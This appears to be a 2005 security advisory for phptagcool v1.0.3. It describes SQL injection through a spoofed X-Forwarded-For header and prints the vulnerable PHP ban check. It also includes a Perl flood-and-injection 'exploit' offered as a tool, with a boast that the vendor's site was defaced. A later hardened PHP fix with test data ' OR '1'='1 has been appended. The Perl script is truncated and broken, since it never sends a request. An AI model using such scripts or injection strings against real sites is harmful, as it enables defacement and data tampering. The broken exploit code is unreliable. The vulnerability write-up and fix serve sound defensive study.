$ author: megabyte
$ contact: megabyte@diosdelared.com megabyte@gobiernofederal.com
mbytesecurity@gmail.com
$ date: aug 24 2005
$ website: http://mbytesecurity.org
$ risk: high
$ vendor url: http://crashcool.com
$ affected software: phptagcool v1.0.3
$ greetz: pandora I love you bb, rootbox for discovering the forwarded-for issue
#####################################################################
-= description =-
-= vulnerabilities =-
- | "sql injection" |
the phptagcool software allows SQL injection by spoofing the X-Forwarded-For
header: the header value is copied into a query without validation or escaping
___________________________________________________________________________
<?php
# get the client ip (vulnerable original: every branch below except REMOTE_ADDR
# takes a value the client can set freely in a request header)
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_VIA'])) {
    $ip = $_SERVER['HTTP_VIA'];
} elseif (isset($_SERVER['REMOTE_ADDR'])) {
    $ip = $_SERVER['REMOTE_ADDR'];
} else {
    $ip = "x.x.x.x";
}
# check whether the user is banned
# connect to the db
$conexion = mysql_connect($host, $usuario, $contrasenya);
# select the db
mysql_select_db($base, $conexion);
# $ip is interpolated unescaped into the SQL string: this is the injection point
$consulta2 = mysql_query("select * from $t_ban where ip='$ip'", $conexion);
____________________________________________________________________________
- | exploit |
you can use any man-in-the-middle software, such as Achilles, to intercept and
edit the HTTP headers.
below is the exploit, which allows two types of attack: flood and SQL injection
#!/usr/bin/perl
## phptagcool zatueritor 1.0
## copyright: megabyte www.mbytesecurity.org
## greetz: rootbox for discovering the forwarded-for issue
## I love you pandora
## crashcool, you were defaced by a bug in your own code; what will you come up
## with now?
use IO::Socket;
$x = 0;
print q(
phptagcool zatueritor 1.0
by megabyte
);
print q(host |sin http://www.| );
$host = <STDIN>;
chop($host);
while ($x != 255) {
    $nick = "nick=megabyte";
    # form body for one tag-board post (built once per iteration)
    $postit = "$nick" . "&url=http%3a%2f%2fwww.mbytesecurity.org&mensaje=floodinglametag&submit=enviar";
    $lrg = length $postit;
    $x++;
}
------------------------------------------------------
-= how to fix =-
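Added example, not code from phptagcool or from the advisory's author: a hardened
replacement for the "get ip" block and the ban check shown in the vulnerabilities
section. It assumes the ban table is named "bans" with an "ip" column (the
original's $t_ban name is not known), uses an in-memory SQLite database through
PDO instead of the original mysql_connect() so it runs stand-alone, and uses a
constructed trusted-proxy address. The two fixes are independent: X-Forwarded-For
is only honoured when the direct peer is a proxy we control and the value
validates as an IP, and the lookup binds the IP as a parameter so the SQL text
cannot be altered by it.

```php
<?php
// Added example (not phptagcool's code). Hardened client-IP resolution and
// ban lookup. Assumes a "bans" table with an "ip" column; the database here is
// an in-memory SQLite instance so the file runs on its own.

// Only these peers may set X-Forwarded-For on our behalf (constructed value;
// in production, list your real reverse proxies / load balancers).
const TRUSTED_PROXIES = ['10.0.0.2'];

// Resolve the client IP from an array shaped like $_SERVER.
// Returns a validated IP string, or null if nothing trustworthy was found.
function client_ip(array $server): ?string
{
    $remote = $server['REMOTE_ADDR'] ?? null;
    if (!filter_var($remote, FILTER_VALIDATE_IP)) {
        return null;
    }
    // X-Forwarded-For only means something when the TCP peer is a proxy we
    // control; from any other peer the header is attacker-controlled input.
    if (in_array($remote, TRUSTED_PROXIES, true)
        && isset($server['HTTP_X_FORWARDED_FOR'])) {
        // Our proxy appends the address it saw as the LAST element; anything
        // further left was supplied by the client and is ignored.
        $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
        $candidate = end($hops);
        if (filter_var($candidate, FILTER_VALIDATE_IP)) {
            return $candidate;
        }
        return null; // proxy forwarded a non-IP value: refuse rather than guess
    }
    return $remote;
}

// Ban lookup with a bound parameter: $ip travels as data, never as SQL text.
function is_banned(PDO $db, string $ip): bool
{
    $stmt = $db->prepare('SELECT 1 FROM bans WHERE ip = :ip LIMIT 1');
    $stmt->execute([':ip' => $ip]);
    return $stmt->fetchColumn() !== false;
}

// --- stand-alone demo with constructed data --------------------------------
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE bans (ip TEXT PRIMARY KEY)');
$db->exec("INSERT INTO bans (ip) VALUES ('203.0.113.9')");

$cases = [
    // direct client sends a hostile header: peer is not a proxy, header ignored
    'spoofed, no proxy' => [
        'REMOTE_ADDR'          => '198.51.100.7',
        'HTTP_X_FORWARDED_FOR' => "' OR '1'='1",
    ],
    // same value arriving through the trusted proxy: rejected by IP validation
    'spoofed via proxy' => [
        'REMOTE_ADDR'          => '10.0.0.2',
        'HTTP_X_FORWARDED_FOR' => "' OR '1'='1",
    ],
    // legitimate proxied request whose real client address is banned
    'banned via proxy' => [
        'REMOTE_ADDR'          => '10.0.0.2',
        'HTTP_X_FORWARDED_FOR' => '192.0.2.44, 203.0.113.9',
    ],
];

foreach ($cases as $label => $server) {
    $ip = client_ip($server);
    if ($ip === null) {
        $state = 'rejected';
    } else {
        $state = is_banned($db, $ip) ? 'banned' : 'allowed';
    }
    printf("%-20s ip=%-14s %s\n", $label, $ip ?? '-', $state);
}
```

Run with `php hardened_ip.php`: the first case is allowed under its real peer
address, the second is rejected before any query runs, and the third is found
in the ban table through the prepared statement. Either fix alone closes the
injection; the proxy check additionally stops a client from evading a ban by
claiming another address.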
-= contact =-
megabyte
http://mbytesecurity.org
the god of the net
greetings to pandora my bb
zeus, cairo, redpoint, x0p0x and all the lame band